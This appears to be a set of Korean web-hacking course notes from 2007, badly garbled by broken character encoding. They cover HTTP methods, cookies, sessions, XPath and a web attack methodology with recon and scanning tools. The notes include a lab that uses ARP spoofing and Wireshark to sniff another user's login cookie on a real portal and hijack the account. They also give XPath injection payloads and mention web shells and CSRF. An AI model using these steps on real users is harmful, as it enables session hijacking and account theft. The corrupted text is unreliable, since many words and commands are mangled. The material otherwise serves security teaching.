-STATELESS ํ•š ํ”„๋กœํ† ์ฝœ(REQUEST ์™€ RESPONSE๊ฐ€ ์ด๋ฃจ์–ด์ง€๋ฉด ์ ‘์†์ด ์ข…๋ฃŒ๋จ (HTTP10)

๊ธฐ๋ณธ์šฉ์–ด

URI (Uniform Resource Idenifier)

-์ธํ„ฐ๋„ท ์ƒ์˜ ์ž์›์„ ์‹๋ณ„ํ•˜๊ธฐ ์œ„ํ•š ๋ฌธ์ž์—ด

URL(Uniform Resource Locator)

-์ž์›์˜ ์œ„์น˜ ์ •๋ณด๊ฐ€ ์ค‘์š”

-httpwwwsitecomsearchasp

URL(Uniform Resource Name)

-์ž์›์˜ ์œ„์น˜์™€ ์ƒ๊ด€์—†์ด ์ž์ฒด์˜ ์ •๋ณด๊ฐ€ ์ค‘์š”ํ•˜๋‹ค

-urnisbn021702452

HTTP ํ”„๋กœํ† ์ฝœ ํ†ต์‹ž ๋ฐฉ์‹

HTTPResposeHeader

HTTPRequestHeader

HTTP 10

ํ•˜๋‚˜์˜ ๋ฌธ์„œ์— ๊ทธ๋ฆผ์ด ํ•˜๋‚˜ ์žˆ๋”๋ผ๋„ ์ตœ์ดˆ ํ…์ŠคํŠธ๊ฐ€ ์ €์žฅ๋œ HTTP ๋ฌธ์„œ๋ฅผ ์ ‚์†ก๋ฐ›๊ณ  ๋‚œ ๋’ค ์—ฐ๊ฒฐ์„ ๋Š๊ณ  ๊ทธ๋ฆผ์„

๋ฐ›๊ธฐ ์œ„ํ•ด ๋‹ค์‹œ ์—ฐ๊ฒฐ์„ ์„ค์ •ํ•š ํ›„ ๊ทธ๋ฆผ์„ ์ ‚์†ก๋ฐ›๋Š”๋‹ค

HTTP11

์—ฐ์†๋œ ์—ฐ๊ฒฐ ์š”์ฒญ์ด ์žˆ์„ ๊ฒฝ์šฐ์— HTML ๋ฌธ์„œ๋ฅผ ๋ฐ›๊ณ  ๋‚œ ๋’ค ์—ฐ๊ฒฐ์„ ๋Š๊ณ  ๋‹ค์‹œ ์—ฐ๊ฒฐ์„ ์š”์ฒญํ•˜์ง€ ์•Š๊ณ  ๋ฐ”๋กœ ๊ทธ๋ฆผ ํŒŒ์ผ

์„ ์š”์ฒญํ•š๋‹ค

HTTP 11์˜ Method

Method ์„ค๋ช…

GET ์ž์›์š”์ฒญ

POST ENTITY๋ฅผ ํฌํ•จํ•š ์ž์› ์š”์ฒญ

HEAD HTTP HEADER ์ •๋ณด๋งŒ ์ˆ˜์‹ž

TRACE Request์˜ ๋ฃจํ”„๋ฐฑ ํ…Œ์ŠคํŠธ

PUT URL์— ์ž์›์„ ์ƒ์„ฑ

DELETE URL์˜ ์ž์›์„ ์‚ญ์ œ

OPTIONS ์‘๋‹ต ๊ฐ€๋Šฅํ•š HTTP๋ฉ”์†Œ๋“œ๋ฅผ ์š”์ฒญ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 3

OPTIONS ์‘๋‹ต ๊ฐ€๋Šฅํ•š HTTP๋ฉ”์†Œ๋“œ๋ฅผ ์š”์ฒญ

CONNECT ํ„ฐ๋„๋ง์˜ ๋ชฉ์ ์œผ๋กœ ์—ฐ๊ฒฐ์š”์ฒญ(Proxy ์—ฐ๊ฒฐ)

GETPOST ๋ฉ”์†Œ๋“œ

GET๊ณผ POST๋Š” ์„œ๋ฒ„์— ์ž์›์„ ์š”์ฒญํ•›๋•Œ ์‚ฌ์šฉ๋จ

GET๋ฐฉ์‹ POST๋ฐฉ์‹

์„œ๋ฒ„์— ์ ‚๋‹ฌํ•˜๊ณ ์žํ•˜๋Š” ๋ฐ์ดํ„ฐ๋ฅผ URL ์— ํฌํ•จ์‹œํ‚ด

์ ‚์†กํ•› ์ˆ˜ ์žˆ๋Š” ๋ฐ์ดํ„ฐ๋Ÿ‰์ด ์ œํ•š๋จ(2K4K)

์„œ๋ฒ„์— ์ ‚๋‹ฌํ•› ๋ฐ์ดํ„ฐ๋ฅผ REQUEST Body์— ํฌํ•จ์‹œํ‚ด

๋ฐ์ดํ„ฐ ์ ‚์†ก๋Ÿ‰์˜ ์ œํ•š์ด ์—†์Œ(์‹œ๊ฐ„์ œํ•š๊ฐœ๋…)

GET loginaspuser_id=adminampuser_pass=1234

HOSTwwwsitecom

POST loginasp HTTP11

HOSTwwwsiteorg

User_id=admin user_pass=1234

get๋ฐฉ์‹(์›น ๋กœ๊ทธ๋Š” 8000์ž ๊นŒ์ง€๋งŒ ์ €์žฅํ•š๋‹ค)

HEAD ๋ฉ”์†Œ๋“œ

TRACE ๋ฉ”์†Œ๋“œ

WEBDAV ๊ด€๋ ฆ๋ฉ”์†Œ๋“œ

PUT

COPY

MOVE

DELETE

MAKECOL

PUT๋ฉ”์†Œ๋“œ ์‚ฌ์šฉ์˜ˆ์ œ

PUT HTTPWWWKISECCOMindex11html HTTP1O

HOSTWWWKISECCOM

Content-Length30

User-AgentBlaBla Client

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 4

User-AgentBlaBla Client

HTTP RESPONSE์˜ ์ฃผ์š” ์‘๋‹ต ์ฝ”๋“œ

์ฃผ์š” ์‘๋‹ต์ฝ”๋“œ

200 OK 400 BadRequest

201 Created 401 Unauthorized

202 Accepted 403 Forbidden

404 Not Found 301 Moved permanently

302 Found 500 Internal Server Error

HTTP ๊ด€๋ ฆ ๊ธฐ์ˆ 

์ฟ ํ‚ค

94๋…„ ๋„ท์Šค์ผ€์ดํ”„์—์„œ ๊ฐœ๋ฐœ

์„œ๋ฒ„๊ฐ€ ์ƒ์„ฑํ•˜๊ณ  ํด๋ผ์ด์–ถํŠธ์— ์ €์žฅ์‹œํ‚ค๋Š” ๋ฐฉ์‹

์ €์žฅ์˜๊ตฌ์ (Persistent๋””์Šคํฌ)๋ฐ˜์˜๊ตฌ์ (Non-Persistent ๋ฉ”๋ชจ๋ฆฌ)

๋ณด์•†๋ณด์•†๋น„๋ณด์•†

์ œํ•šํฌ๊ธฐ์ œํ•š(4k)๋ณ€์ˆ˜์ œํ•š(2k)

ํ•š๋ฒˆ ์ €์žฅ๋œ ์ฟ ํ‚ค๋Š” ์ฟ ํ‚ค์˜ ์œ ํšจ๊ธฐ๊ฐ„์ด ์ง€๋‚˜์ง€ ์•Š๋Š” ํ•š ํ•ด๋‹น ๋„๋ฉ”์ธ์— ์ ‘์†์‹œ ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ์ž๋™์œผ๋กœ ํƒ‘์žฌํ•˜์—ฌ ์ ‚์†ก

ํ•˜๊ฒŒ ๋จ

์ฟ ํ‚คํŒŒ์ผํ˜•ํƒœ์‚ฌ์šฉ์ž์ด๋ฆ„์ ‘์†ํ•š์‚ฌ์ดํŠธ

์ฟ ํ‚คํŒŒ์ผ๋‚ด์šฉ๊ฐœ๋ฐœ์ž๊ฐ€ ์„ค์ •ํ•˜๊ธฐ ๋‚˜๋ฆ„

๋””ํดํŠธ ๋””๋ ‰ํ† ๋ฆฌ CDocuments and Setting์‚ฌ์šฉ์ž์ด๋ฆ„Cookies

๊ธฐ๋ณธํฌ๋งท

Set-cookie

Name=value ์ฟ ํ‚ค์˜ ์ด๋ฆ„

Expire=date ์ฟ ํ‚ค์˜ ์œ ํšจ๊ธฐ๊ฐ„

Domain=domain ๋„๋ฉ”์ธ

Path=path ์ฟ ํ‚ค๋ฅผ ์ด์šฉํ•˜์—ฌ ์ ‘์†์‚ฌ๋Šฅํ•š URL

Secure ๋ณด์•†๋น„๋ณด์•†์„ค์ •

๊ด€๋ ฆ ISSUE

์‚ฌ์šฉ์ž ์ž„์˜์กฐ์ž‘ ๋ฐ ์Šค๋‹ˆํ•‘ ํ”„๋ก์‹œ ๋“ฑ์„ ํ†ตํ•š ๋ณ€์กฐ๊ฐ€๋Šฅ

XSS๋“ฑ์„ ํ†ตํ•š ํƒ€์ธ์˜ ์ฟ ํ‚คํƒˆ์ทจ

์žฌ์ƒ๊ณต๊ฒฉ์— ๋ฌด๋ฐฉ๋น„

๋Œ€์‘๋ฐฉ์•† ์ฟ ํ‚ค๋Š” ์‚ฌ์šฉํ•˜์ง€ ์•Š๋Š”๋‹ค๋Š” ๊ธฐ๋ณธ ์ฒ ์น™ ์‚ฌ์šฉํ•› ๊ฒฝ์šฐ ๊ฒ€์ฆ๋œ ์•”ํ˜ธํ™” ์•Œ๊ณ ๋ฆฌ์ฆ˜์œผ๋กœ ์ตœ์†Œํ•š์˜ ์ •๋ณด๋งŒ

์ €์žฅ ์ฟ ํ‚ค์˜ ๋ฌด๊ฒฝ์„ค ๊ฒ€์‚ฌ๋ฅผ ์œ„ํ•ด ์ ‚์†ก๋˜๋Š”(ํŠน์ • ๋ณ€์ˆ˜ ๊ฐ’+TimeStamp)๋“ฑ์˜ ์ •๋ณด๋ฅผ ํ•ด์‹œํ•š ๊ฐ’๊นŒ์ง€ ๊ฐ™์ด

์ ‚์†ก ์™„๋ฒฝํ•˜์ง‚ ์•Š์œผ๋‚˜ ์„ธ์…˜๊ณผ ๊ฐ™์ด ๋ณ‘ํ–‰์‹œ ๋ณด์•†์„ฑ ํ–ฅ์ƒ

์„ธ์…˜(SESSION)

HTTP์ ‘์† ์„ธ์…˜์— ๋Œ€ํ•š ์ฒ˜๋ฆฌ๋ฅผ ๋‹ด๋‹นํ•˜๋Š” ๊ธฐ์ˆ 

Server Side ๊ธฐ์ˆ ๋กœ HTTP์˜ Stateless ํ•š ํŠน์„ฑ์„ ๋ณด์™„ํ•˜๊ธฐ ์œ„ํ•ด Uniq ํ•š ID๋ฅผ ์ƒ์„ฑํ•˜์—ฌ ํ˜„์žฌ ์ ‘์†ํ•š ํด๋ผ์ด์–ถํŠธ์—๊ฒŒ

ํ•›๋‹นํ•ด์ฃผ๊ณ  ๊ธฐ์–ตํ•˜๋Š” ๋ฐฉ์‹

๊ณผ๊ฑฐ cookie์— ์ €์žฅํ•˜๋˜ ๋ณ€์ˆ˜ ๊ฐ’ ์„ ์ดˆ๊ธฐ ์ ‘์† ์‹œ ํ•›๋‹นํ•˜๊ฒŒ ๋จ

ํ•›๋‹นํ•š ๋ณ€์ˆ˜๋Š” ์„œ๋ฒ„์— ์ €์žฅ๋˜๋ฉฐ ํด๋ผ์ด์–ถํŠธ ์ธก ์—๋Š” ์„ธ์…˜ ID๋งŒ ๋ถ€์—ฌ๋จ

์ฃผ๋กœ Web Application Server ๋‚˜ Web Server ๋ฅผ ํ•›๋‹น ๋ฐ›์œผ๋ฉฐ ์ด๋•Œ ํ•ด๋‹น ID์— ํŠน์ • ์ •๋ณด๋ฅผ ์ €์žฅํ•› ์ˆ˜ ์žˆ์Œ

ํด๋ผ์ด์–ถํŠธ๋Š” ์„œ๋ฒ„์™€ ํ†ต์‹ž์‹œ SESSION ID๋งŒ ์ฃผ๊ณ  ๋ฐ›์Œ

์„ธ์…˜ID

WASWS ์„ธ์…˜ ID๋ณ€์ˆ˜

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 5

IIS ASPSESSIONID

APACHE SESSIONID

TOMCAT JSESSIONID

PHP PHPSESSID

๊ธฐํƒ€ JServerSessionID

JWSESSIONID

SESSID

SESSION

SID

SESSION_ID

์„ธ์…˜

WASWS ๋งˆ๋‹ค ๋‹ค๋ฅด์ง€๋งŒ ๋ณดํ†ต 10๋ถ„20๋ถ„ ์„ค์ •์ž„

์‚ฌ์šฉ์ž๊ฐ€ ๋น„์ •์ƒ ๋กœ๊ทธ์•„์›ƒ ํ•˜๊ฑฐ๋‚˜ Request ์š”์ฒญ ์—†์„ ์‹œ ์œ„ ํƒ€์ž„ ์•„์›ƒ ๊ฐ’ ์ดˆ๊ณผ ํ›„ ํ•ด๋‹น ์„ธ์…˜ID๋Š” ์†Œ๋ฉธ

์„ธ์…˜๋„ ์ฟ ํ‚ค์™€ ๊ฐ™์€ ์œ ํšจ๊ธฐ๊ฐ„ ์žˆ์Œ

๊ด€๋ ฆ ISSUE

์ดˆ๊ธฐ์„ธ์…˜๊ฐ์ฒด ์ƒ์„ฑ์‹œ ํด๋ผ์ด์–ถํŠธ์˜ IP ๋ฉ”์ธ๋ณด๋“œSN ํ•˜๋“œ๋””์Šคํฌ SN๋“ฑ Uniq ํ•š ๊ฐ’์„ ์„ค์ •ํ•š ํ›„ ๋งค ํŽ˜์ด์ง€๋งˆ๋‹ค

์ธ์ฆ๋น„๊ต๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ์„ ์˜ˆ๋ฐฉํ•› ์ˆ˜ ์žˆ์Œ

์‚ฌ์šฉ์ž ์ž„์˜์กฐ์ž‘์„ ํ†ตํ•š ๊ณต๊ฒฉ์‹œ๋„

์„ธ์…˜ ์ดˆ๊ธฐ ์ƒ์„ฑ์‹œ๋งˆ๋‹ค ์ƒˆ๋กœ์šด ID๋ฅผ ์ƒ์„ฑ

์žฌ์ƒ๊ณต๊ฒฉ

์‹ค์Šต

Cookie๊ฐ’์„ ์Šค๋‹ˆํ•‘ ํ•ด์„œ ์ƒ๋Œ€๋ฐฉ Cookie๊ฐ’์œผ๋กœ ์ƒ๋Œ€๋ฐฉ ๊ณ„์ •์œผ๋กœ ๋กœ๊ทธ์ธ

์‹ค์Šตํ™˜๊ฒฝWinArpSpoof or CainampAbel or wireshark

Wireshark๋กœ arp ์Šคํ‘ธํ•‘์„ ํ•ด์„œ ํŒจํ‚ท์ด ๋‚˜์—๊ฒŒ ๋„˜๊ฒจ์˜ค๊ฒŒ ๋งŒ๋“ž๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 6

ํ™”๋ฉด๊ณผ ๊ฐ™์ด wireshark๋ฅผ ์ค€๋น„ํ•š๋‹ค

์Šคํ‘ธํ•‘์„ ํ•˜๊ณ  ์žˆ์œผ๋ฉด ์ƒ๋Œ€๋ฐฉ ์ธก์—์„œ wwwnavercom ์— ๋กœ๊ทธ์ธ์„ ํ•˜๊ฒŒ ๋˜๋ฉด ํŒจํ‚ท์ด ๋‚ ๋ผ ์˜ค๊ฒŒ ๋œ๋‹ค ์—ฌ๊ธฐ์„œ ์šฐ๋ฆฌ๋Š”

๋กœ๊ทธ์ธ ๊ด€๋ ฆ ํŒจํ‚ท ๋งŒ ์•Œ์•„๋ณด๊ธฐ ์œ„ํ•ด ํ•„ํ„ฐ์— httprequestmethod == POST ๋ฅผ ์นš๋‹ค

๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋‚˜์˜ฌ ๊ฒƒ์ด๋‹ค Set-Cookie๋ถ€๋ถ„์„ ๋ณต์‚ฌํ•ด ๋‘”๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 7

๋‹ค์Œ๊ณผ ๊ฐ™์ด ์„ค์ •์„ ์กฐ๊ธˆ ๋ณ€๊ฒฝ ์‹œ์ผœ์ค€๋‹ค

๋‹ค์Œ๊ณผ ๊ฐ™์ด ์…‹ํŒ…์„ ํ•ด๋‘”๋‹ค

๊ทธ๋Ÿผ ๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋กœ๊ทธ์ธ์ด ๋˜๋Š” ์žฅ๋ฉด์„ ๋ณผ ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

์—ฌ๊ธฐ์„œ๋Š” XSS๋ฅผ ์‚ฌ์šฉํ•˜์ง€ ์•Š๊ณ  Network์ƒ์—์„œ Cookie๊ฐ’์„ ํ›”์ณ์„œ ๊ณ„์ •์„ ํ›”์ณ ๋ณด์•˜๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 8

XML ํŠน์ง•

๋ฌธ์„œ์˜ ๋‚ด์šฉ๊ณผ ๋””์ž์ธ์ด ์™„์ ‚ํžˆ ๋ถ„๋ฆฌ

๋ฌธ์„œ๊ตฌ์กฐ๋Š” XML๋กœ ํ”„๋ฆฌ์ žํ…Œ์ด์…˜์€ XSL์„ ํ†ตํ•ด

๋‹ค์–‘ํ•š ๋ฐฉ์‹์˜ ๋งํฌ ๊ธฐ๋Šฅ ์ œ๊ณต

ํ‘œ์ค€ํ™”๋œ DTD์„ ํ†ตํ•ด ๋ชจ๋“ž ๋ถ„์•ผ์— ์‚ฌ์šฉ๊ฐ€๋Šฅ

DOM(Document Object Model)

SAX(Simple API for XML)

XML๊ตฌ์กฐ2๊ฐ€์ง€ ๋Œ€ํ‘œ์  ๋ชจ๋ธ์กด์žฌ

๊ตฌ์„ฑ์š”์†Œ ์„ค๋ช…

์—˜๋ฆฌ๋จผํŠธ ๋งˆํฌ์—… ํƒœ๊ทธ์™€ ๊ทธ ์•†์— ํฌํ•จ๋œ ๋‚ด์šฉ

๋นˆ ์—˜๋ฆฌ๋จผํŠธ ๋‚ด์šฉ์„ ํฌํ•จํ•˜์ง€ ์•Š๋Š” ๋นˆ ์—˜๋ฆฌ๋จผํŠธ

๋ฃจํŠธ ์—˜๋ฆฌ๋จผํŠธ ๋ฌธ์„œ๋‚ด ๋ชจ๋“ž ์—˜๋ฆฌ๋จผํŠธ์™€ ๋‚ด์šฉ์„ ํฌํ•จํ•˜๊ณ  ์žˆ๋Š” XML ๋ฌธ์„œ์˜ ์—˜๋ฆฌ๋จผํŠธ

์†์„ฑ ์—˜๋ฆฌ๋จผํŠธ์— ํฌํ•จ๋˜์–ด ์ถ”๊ฐ€์ ์ธ ์ •๋ณด๋ฅผ ์ œ๊ณต

ltimg src=balbalbalgtbalbalballtimggt

์—”ํ‹ฐํ‹ฐ ํ…์ŠคํŠธ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฐ์ดํ„ฐ ๋น„ ์•„์Šคํฌ ๋ฌธ์ž๋ฅผ ์ €์žฅํ•˜๋Š”๋ฐ ์‚ฌ์šฉ

์ฒ˜๋ฆฌ๋ช…๋ น ์ ‚์ฒด ๋ฌธ์„œ๋‚˜ ๋ฌธ์„œ์˜ ์ผ๋ถ€๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ์‘์šฉํ”„๋กœ๊ทธ๋žจ๊ณผ ์—ฐ๊ฒฐํ•ด ์ฃผ๋Š” ๋ช…๋ น์–ด lt gt

์ฃผ์„ XML ํ”„๋กœ์„ธ์„œ๊ฐ€ ํ•ด์„ํ•˜์ง€ ์•Š๋Š” ์„ค๋ช…๋ฌธ

lt-- --gt

CDATA์„น์…˜ ํŠน์ˆ˜ํ•š ๋ฌธ์ž๋ฅผ ์ผ๋ฐ˜ ํ…์ŠคํŠธ๋กœ ์ธ์‹ํ•˜๋„๋ก ํ•˜๋Š” ํ‘œ๊ธฐ๋ฒ•

lt[CDATA[hellipstring]]gt

Xpath

Xml ๋ฌธ์„œ์— ๋Œ€ํ•š ์งˆ์˜์–ถ์–ด

SQL๋ฌธ์€ ํŠน์ • ํ…Œ์ด๋ธ”์˜ ํ–‰๊ณผ ์—ด์„ ์„ ํƒ

Xpath๋Š” ํŠน์ • XML๋ฌธ์„œ์˜ ๋…ธ๋“œ์™€ ๋…ธ๋“œ์…‹์„ ์„ ํƒ

๊ด€๋ ฆ Issue

์˜ˆ)bookbook[ISBN=1111 or 1=1]

๋ชจ๋“ž book ๋…ธ๋“œ๋“ค์— ์ ‘๊ทบ๊ฐ€๋Šฅ

Xpath๊ณต๊ฒฉ

๋Œ€ํ˜• ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ(like DOS)

XML์˜ ๋…ธ๋“œ์™€ ์†์„ฑ์ด ์ค‘์ฒฉ ์„ ์–ถ๋  ์ˆ˜ ์žˆ๋‹ค๋Š” ์ ์„ ์•…์šฉ

ํŠน์ • ๋…ธ๋“œ์•†์— ๋™์ผ ๋…ธ๋“œ๋ช… ๋ฐ˜๋ณต์„ ์–ถ์†์„ฑ ๋ฌดํ•š์„ ์–ถ

์žฌ๊ท€ ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ

`or loginid(nodeLoginID())=LoginID or a=b

07๋…„ ํ•ดํ‚น๋ฐฉ์–ด๋Œ€ํšŒ๋ฌธ์ œ

WebService

์ •์˜๋„คํŠธ์›Œํฌ์ƒ์—์„œ ์ ‘๊ทบ ๊ฐ€๋Šฅํ•š ์†Œํ”„ํŠธ์›จ์–ด ๊ธฐ๋Šฅ๋‹จ์œ„๋กœ ํ”Œ๋žซํผ ํ”„๋กœ๊ทธ๋ž˜๋ฐ ์–ถ์–ด ๋ฐ ์ปดํฌ๋„ŒํŠธ ๋ชจ๋ธ์— ๋…

๋ฆฝ์ ์ธ ๊ธฐ์ˆ ๋กœ ๋งŒ๋“ค์–ด์ง‚ ์†Œํ”„ํŠธ์›จ์–ด

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

Web Hacking 2์ผ์ฐจ

2007๋…„ 10์›” 23์ผ ํ™”์š”์ผ

์˜ค์ ‚ 934

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 9

์›น ํ•ดํ‚น ๊ณต๊ฒฉ ์ ƒ์ฐจ

FootPrinting Scanning Enumeration

PllferingEscalatingPrivledge

GainingAccess

CreatingBack Doors

CoveringTracks

๊ณต๊ฒฉ์ ƒ์ฐจ

์ •๋ณด์ˆ˜์ง‘

Profiling

๋ถ„์„

Analysis

๊ณต๊ฒฉ

AttackEcploit

hellip

์‚ฌํšŒ๊ณตํ•™

๊ฒ€์ƒ‰์—”์ง‚

FootPrinting

PortScan

Web Site ๋ฏธ๋Ÿฌ๋ง

Web ๊ตฌ์กฐ๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

Account ์ˆ˜์ง‘

OS์ •๋ณด์ทจ์•ฝ์ 

ํฌํŠธ๋ณ„์„œ๋น„์Šค์ทจ์•ฝ์ 

์ ‚์ฒด๊ตฌ์กฐ์†Œ์Šค์ฃผ์„

์ฟ ํ‚ค๋“ฑ ๋ถ„์„

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

BF Guessing

OSNetwork Service

Exploitation

๊ถŒํ•š์ƒ์Šน

OWASPWASC๋“ฑ์— ์˜ํ•š ๊ณต๊ฒฉ

๋ณด๊ณ ์„œ

1์ •๋ณด์ˆ˜์ง‘

์‚ฌํšŒ๊ณตํ•™

๋„๋ฉ”์ธ ์ •๋ณด IP Block ์ •๋ณด

Whois

Dig

Whosip

Netcraft

๊ธฐ๋ณธ์ •๋ณด

httpwebarchiveorg

Google Cache

Web Archive

httpjohnnyihackstuffcom

์‹ฌ์ •์žฌ(googledorkpdf)

Google Dork

Google hacking DB ์‚ฌ์šฉ

Google API Key(ํ‚ค ๋ฐœ๊ธ‰ ํ์ง€)

SiteDigger Wikto

๊ฒ€์ƒ‰์—”์ง‚(No-Tech Hacking)

๊ตฌ๊ธ€ ํ•ดํ‚น ํ‚ค์›Œ๋“œ ์ œ๊ณต ์‚ฌ์ดํŠธ

Footprinting Web Server

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 10

AFD(Acitive Filter Detection)

ICMP TTL๊ฐ’์„ ์กฐ์ ƒํ•ด๊ฐ€๋ฉฐ ์›น ์„œ๋ฒ„ ํƒ์ง€

netcraftcom

Stealth Scan-sS

Normal Scan-sT-sU

Network Services Version Scan-sV

OSDetection-O-A

DoNotPing_P0

Idle scan

IDS์šฐํšŒ

httpunicornscanorg

Unicorn scan -mT -p -v -r 2501921681024q

Unicornscan

Nc

jikto

Port Scan(Port Mapping)

httTrack

Web Site Mirroring

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 11

-grepegrep awksedsortuniq(moreheadless)๋“ฑ ํ™œ์šฉ

Mirroring ํ›„ ์ •์  ๋ถ„์„

balckwindow

InteliTamper

Wikto

Web๊ตฌ์กฐ ๋ถ„์„(๋ฐ˜์ž๋™)

Httpwatch

TamperlE

Cooxie

LiveHttpHeaders(firefox)

Command line tool(nccurlopenssl)

Manual Analysis

ParosWebscrabFidderBurpIntruder

SoftwareProxy

Web๊ตฌ์กฐ๋ถ„์„(์ˆ˜์ž‘์—…)

๊ด€๋ฆฌ์žํŽ˜์ด์ง€

์ž๋ฃŒ์‹ค(web shell)

ํ†ต๊ณ„ ์ƒํƒœ ํŽ˜์ด์ง€

ํšŒ์›๋“ฑ๋ก์šฐํŽธ๋ฒˆํ˜ธ ์กฐํšŒ(์ธ์ ์…˜๊ณต๊ฒฉ)

(์ธ์ ์…˜์€ ์ž…๋ ฅ๊ฐ’์„ ๋„ฃ์—ˆ์„๋•Œ ๊ฒฐ๊ณผ๋ฅผ ๋ฟŒ๋ ค์ฃผ๋Š” ํŽ˜์ด์ง€๋ฅผ ์ฐพ์•„์•ผํ•š๋‹ค)์•†๋ณด์—ฌ์ฃผ๋Š”๊ฑด ๋ธ”๋ผ์ธ๋“œ ์ธ์ ์…˜

์•”ํ˜ธ๋ถ„์‹ค(์•”ํ˜ธ ํš๋“ ์ˆ˜์›”)

์ •๋ณด์ˆ˜์ •(์ˆ˜ํ‰์ˆ˜์ง์ƒ์Šน๊ธฐํšŒ)

ํšŒ์›๊ฐ€์ž…ํŽ˜์ด์ง€

๊ฒฐ์ œ ํŽ˜์ด์ง€

Basic Banner Garbbing

Http resonse ํ—ค๋” ์ˆš์„œ

Http resonse ํ—ค๋” ์กด์žฌ ์œ ๋ฌด

Http resonse ํ—ค๋”์˜ ํŠน์ • ๊ฐ’

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 12

Tracehead ๋“ฑ์— ๋Œ€ํ•š ์ƒ์ดํ•š ์‘๋‹ต

๋ฐ์ดํ„ฐ์—†์ด ์ ‚์†กํ•š put์— ๋Œ€ํ•š์‘๋‹ต

Unexpercted Method ์ ‚์†ก

๋™์ผ์š”์ฒญ ๋ฐ˜๋ณต ์ ‚์†ก

์ทจ์•ฝ์  ์Šค์บ”(system)

Xscan

Nessus

n-stealth security scanner

์ทจ์•ฝ์  ์Šค์บ”(Web Server amp WAS amp Web App)

APP SCANNER

ACUNETIX

NSTALKER SCANNER

์Šค์บ” ISSUE

BASIC DIGEST NTML CERT

FORM-BASED

์ธ์ฆ์ •๋ณด ์„ค์ •

์Šค์บ” ๊ฐ•๋„(๋ฉ€ํ‹ฐ ์ปค๋„ฅ์…˜ ํƒ€์ž„์•„์›ƒ ๊ณต๊ฒฉ๋ชจ๋“œ๋น„๊ณต๊ฒฉ๋ชจ๋“œ)

๋ถ„์„

์˜๋ฏธ์žˆ๋Š” ์ •๋ณด๋กœ ๊ฐ€๊ณต

ACCOUNT ์ˆ˜์ง‘

OS์ •๋ณด์— ๋”ฐ๋ฅธ ์ทจ์•ฝ์  ์ˆ˜์ง‘

ํฌํŠธ๋ณ„ ์„œ๋น„์Šค ์ทจ์•ฝ์ 

์›น์„œ๋ฒ„ ์ ‚์ฒด๊ตฌ์กฐ ๋ถ„์„

์ฃผ์„

ํžˆ๋“ž ํ•„๋“œ

์†Œ์Šค๋ถ„์„

์ฟ ํ‚ค๋ถ„์„

์„ธ์…˜ID์ƒ์„ฑ ์ทจ์•ฝ์  ๋ถ„์„

๊ณต๊ฒฉ

์ •๋ณด์— ๊ทบ๊ฑฐํ•š ๊ณต๊ฒฉ

๋ฌด์ž‘์œ„ ๊ณต๊ฒฉ

์‚ฌ์ ‚๊ณต๊ฒฉ

๊ณต๊ฒฉ์ดˆ์ 

์ˆ˜์ง‘๋œ ACCOUNT ์ •๋ณด๋ฅผ์ด์šฉ

OSNETWORK SERVICE ๊ณต๊ฒฉ

WEBSERVER WEBAPP SERVER WEBAPPLICATION

SQLISCANNER

๊ถŒํ•š ์ƒ์Šน

์ˆ˜ํ‰

ํšŒ์›์ •๋ณด ์ˆ˜์ •

Cookie Stealing

CSRF

์ˆ˜์ง

CSRF

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 13

์ ‚์ œ์กฐ๊ฑด์€ ๋‚ด๋ถ€๋ง์˜ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋‘ ์•Œ๊ณ  ์žˆ์„ ๊ฒฝ์šฐ

CSRF๋ฅผ ํ†ตํ•ด DMZ์˜์—ญ์— ์ ‘์†ํ•š ๊ด€๋ฆฌ์ž์—๊ฒŒ ๋‚ด๋ถ€ ZONE์ชฝ์œผ๋กœ ๊ฐ•์ œ REQEUST๋ฅผ ํ•˜๋„๋ก ์กฐ์ž‘ ๊ฐ€๋Šฅ

OWASPWASC

์ˆ˜์ž‘์—…

์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์  ๊ณต๊ฒฉ

์œ„ํ—˜๋„์— ๋”ฐ๋ผ ๊ณต๊ฒฉ

